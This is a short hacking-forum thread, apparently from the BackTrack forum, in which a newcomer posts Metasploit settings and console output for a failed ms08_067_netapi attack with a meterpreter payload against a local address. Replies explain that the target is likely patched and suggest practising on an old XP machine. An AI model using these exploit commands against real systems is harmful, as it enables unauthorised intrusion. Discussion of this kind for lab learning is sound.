Results 1 to 5 of 5

Thread: Please teach me about Metasploit

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    1

    Post Please teach me about Metasploit

    hi guyz,
    guyz i need ur help. below are the setting i am trying to use ms08_067_netapi but i don't no where i was wrong i google it but still there's no answer can any one tell me that where i was wrong/doing mistake. your response will be appreciated. and thanks in advance...



    Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.6 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE srvsvc yes The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.1.6 no The target address


    Exploit target:

    Id Name
    -- ----
    0 Automatic Targeting


    msf exploit(ms08_067_netapi) > set lport 254
    lport => 254
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created


    Quote Originally Posted by thorin View Post
    Because your exploit wasn't successful and it wasn't successful because whatever system call needed to be made was interrupted. This could be because the system is patched, this could be because a software FW or other protection kicked in. etc etc.

    hi guys,
    guys i need your help. i download the latest version of metasploit from their website and now i am trying to use windows/smb/ms06_040_netapi. but it show that[*] Exploit completed, but no session was created below is complete there message and my configuration which i set......
    i google it alot but still there is no answer.. can u please tell where i was wrong... Thanks in advance



    Module options:

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.1.6 yes The target address
    RPORT 445 yes Set the SMB service port
    SMBPIPE srvsvc yes The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique: seh, thread, process
    LPORT 4444 yes The local port
    RHOST 192.168.1.6 no The target address


    Exploit target:

    Id Name
    -- ----
    0 Automatic Targeting


    msf exploit(ms08_067_netapi) > set lport 254
    lport => 254
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler[*] Automatically detecting the target...[*] Fingerprint: Windows XP Service Pack 3 - lang:English[*] Selected Target: Windows XP SP3 English (NX)[*] Triggering the vulnerability...[*] Exploit completed, but no session was created

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Thats means the box you are attacking is not vulnerable.

  3. #3
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by finalversion_2k View Post
    hi guyz,
    Do not double post your posts need to be approved by a moderator during your first three days here. Also don't hijack it's considered rude.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  4. #4
    Very good friend of the forum hhmatt's Avatar
    Join Date
    Jan 2010
    Posts
    660

    Default

    If your machine is fully updated and patched there's a very low chance that any of metasploit's exploits will actually work. Get yourself an old machine and install xp sp0 or sp1 and exploit the crap out of it. Another option would be to find a piece of software with known vulnerabilities and install it.

    If you want to learn more about metasploit look no further than here:

    http://www.offensive-security.com/metasploit-unleashed/

  5. #5
    Member
    Join Date
    Jan 2010
    Location
    The new forums
    Posts
    462

    Default

    I think this came from another thread I posted the Metasploit Unleashed course for someone else, but since it's a new thread here you go OP. All your Metasploit questions can be answered there. As said for MS08-067, if the machine is patched since (Oct 08?) you're out of luck.

    http://www.offensive-security.com/metasploit-unleashed/

    edit: Doh! hhmatt81 beat me to it, this post can be deleted.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •